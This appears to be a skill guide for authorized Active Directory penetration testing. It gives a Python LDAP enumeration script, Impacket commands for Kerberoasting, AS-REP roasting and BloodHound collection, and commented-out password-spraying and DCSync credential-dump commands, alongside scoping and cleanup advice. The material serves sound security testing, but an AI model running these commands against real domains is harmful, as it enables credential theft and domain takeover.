Active Directory Attacks Toolkit

Conduct authorized security assessments of Microsoft Active Directory environments. This skill covers AD reconnaissance, credential harvesting, Kerberos attack techniques, lateral movement, privilege escalation, and domain persistence — all within the context of authorized penetration testing engagements.

When to Use This Skill

Choose Active Directory Attacks Toolkit when you need to:

• Perform authorized penetration tests against Active Directory domains
• Identify misconfigurations in AD that could lead to domain compromise
• Test Kerberos authentication security (Kerberoasting, AS-REP roasting)
• Validate detection capabilities for AD attack techniques in purple team exercises

Consider alternatives when:

• You need to harden AD configurations defensively (use Microsoft security baselines)
• You need cloud identity testing (use Azure AD/Entra ID security tools)
• You need network-layer penetration testing (use general network pentest tools)

Quick Start

Copy
# Install key tools (Kali Linux or authorized testing platform)
sudo apt install bloodhound neo4j ldap-utils smbclient
pip install impacket ldap3 bloodhound-python

Copy
# AD Enumeration with ldap3 (authorized testing only)
from ldap3 import Server, Connection, ALL, SUBTREE

def enumerate_ad(dc_ip, domain, username, password):
    """Enumerate Active Directory objects via LDAP."""
    server = Server(dc_ip, get_info=ALL)
    conn = Connection(server, user=f"{domain}\\{username}",
                      password=password, auto_bind=True)

    base_dn = ','.join([f'DC={part}' for part in domain.split('.')])

    # Find domain admins
    conn.search(
        base_dn,
        '(&(objectClass=group)(cn=Domain Admins))',
        search_scope=SUBTREE,
        attributes=['member']
    )
    if conn.entries:
        print("Domain Admins:")
        for member in conn.entries[0].member.values:
            cn = member.split(',')[0].replace('CN=', '')
            print(f"  - {cn}")

    # Find computers
    conn.search(
        base_dn,
        '(objectClass=computer)',
        search_scope=SUBTREE,
        attributes=['cn', 'operatingSystem', 'lastLogonTimestamp']
    )
    print(f"\nComputers found: {len(conn.entries)}")
    for entry in conn.entries[:5]:
        print(f"  {entry.cn}: {entry.operatingSystem}")

    # Find SPNs (potential Kerberoasting targets)
    conn.search(
        base_dn,
        '(&(objectClass=user)(servicePrincipalName=*))',
        search_scope=SUBTREE,
        attributes=['cn', 'servicePrincipalName', 'memberOf']
    )
    print(f"\nAccounts with SPNs (Kerberoasting targets): {len(conn.entries)}")
    for entry in conn.entries:
        print(f"  {entry.cn}: {entry.servicePrincipalName}")

    conn.unbind()

# enumerate_ad('192.168.1.10', 'corp.local', 'testuser', 'TestPass123')

Core Concepts

AD Attack Phases

Phase	Techniques	Tools
Reconnaissance	LDAP enumeration, DNS queries, SMB enumeration	ldapsearch, BloodHound, enum4linux
Credential Harvesting	Kerberoasting, AS-REP roasting, password spraying	Impacket, Rubeus, CrackMapExec
Lateral Movement	Pass-the-hash, overpass-the-hash, WMI/PSExec	Impacket, Mimikatz, Evil-WinRM
Privilege Escalation	ACL abuse, GPO exploitation, delegation attacks	BloodHound, PowerView, SharpHound
Domain Persistence	Golden/Silver tickets, DCSync, skeleton key	Mimikatz, Impacket secretsdump

Kerberos Attack Techniques

Copy
# All commands for AUTHORIZED testing only

# 1. Kerberoasting — Extract service ticket hashes
# Requires: valid domain credentials
python3 -m impacket.GetUserSPNs \
    corp.local/testuser:'TestPass123' \
    -dc-ip 192.168.1.10 \
    -request \
    -outputfile kerberoast_hashes.txt

# 2. AS-REP Roasting — Target accounts without pre-auth
python3 -m impacket.GetNPUsers \
    corp.local/ \
    -dc-ip 192.168.1.10 \
    -usersfile users.txt \
    -format hashcat \
    -outputfile asrep_hashes.txt

# 3. Password Spraying (with lockout-safe delay)
# crackmapexec smb 192.168.1.10 \
#     -u users.txt -p 'Spring2025!' \
#     -d corp.local \
#     --continue-on-success

# 4. BloodHound Collection
python3 -m bloodhound \
    -c All \
    -u testuser -p 'TestPass123' \
    -d corp.local \
    -dc dc01.corp.local \
    -ns 192.168.1.10

# 5. DCSync (requires replication rights — domain admin equiv)
# python3 -m impacket.secretsdump \
#     corp.local/admin:'AdminPass'@192.168.1.10 \
#     -just-dc-ntlm

Configuration

Parameter	Description	Default
domain	Target AD domain FQDN	Required
dc_ip	Domain controller IP address	Required
username	Authorized test account	Required
password	Test account password	Required
spray_delay	Seconds between password spray attempts	30
lockout_threshold	Max attempts before lockout (check AD policy)	5
bloodhound_collection	Collection methods (All, DCOnly, Session)	"All"
hash_format	Cracking format (hashcat, john)	"hashcat"

Best Practices

1. Always verify authorization scope before testing — AD attacks can disrupt production services and lock out user accounts. Confirm in writing: which domains, forests, and OUs are in scope; testing windows; emergency contacts; and whether destructive techniques (DCSync, Golden Ticket) are authorized.

2. Check account lockout policies before password spraying — Query the domain's lockout threshold and observation window with net accounts /domain. Spray one password across all accounts, then wait for the observation window to reset. Exceeding the threshold locks legitimate users out of production systems.

3. Use BloodHound to identify the shortest attack path — Rather than testing every possible technique, import BloodHound data and query for shortest paths to Domain Admin. This focuses the engagement on realistic attack chains and produces more actionable findings for defenders.

4. Document every command and timestamp during testing — Maintain a detailed log of commands executed, times, source/destination IPs, and results. This is essential for incident response correlation, proving scope compliance, and writing the final penetration test report.

5. Clean up persistence mechanisms after testing — Remove any Golden/Silver tickets, scheduled tasks, registry modifications, or accounts created during testing. Document any artifacts that couldn't be removed and notify the client's security team to remediate them.

Common Issues

Kerberoasting returns no results — No service accounts have SPNs set, or your query filter is too restrictive. Verify with LDAP: (&(objectClass=user)(servicePrincipalName=*)(!(objectClass=computer))). Machine accounts have SPNs but their passwords are 120+ characters and uncrackable.

Password spray triggers lockouts despite safe intervals — Another tester or automated system may also be testing the same accounts. Coordinate with the client to ensure no concurrent authentication testing. Also check if fine-grained password policies apply different thresholds to different OUs.

BloodHound shows no paths to Domain Admin — The collection may be incomplete (session data requires admin rights on target machines). Run collection with -c All from a machine with local admin access across the domain. Also check if trusts exist — the path may go through a trusted domain.